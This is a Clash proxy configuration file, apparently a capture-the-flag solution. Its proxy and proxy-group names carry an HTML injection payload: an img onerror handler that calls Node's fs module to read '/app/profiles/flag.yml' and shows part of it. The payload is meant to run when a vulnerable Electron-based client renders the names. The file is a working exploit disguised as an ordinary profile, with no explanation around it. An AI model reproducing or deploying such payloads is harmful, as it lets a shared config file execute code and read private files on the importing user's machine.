port: 7890
mode: Rule
log-level: info
external-controller: ":9090"
proxies:
  - name: a<img/src="1"/onerror="this.alt=require('fs').readFileSync('/app/profiles/flag.yml','utf8').substr(85,40)";>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  - name: b<img/src="1"/onerror="this.alt=require('fs').readFileSync('/app/profiles/flag.yml','utf8').substr(85,40)";>
    type: select
    proxies:
      - a<img/src="1"/onerror="this.alt=require('fs').readFileSync('/app/profiles/flag.yml','utf8').substr(85,40)";>
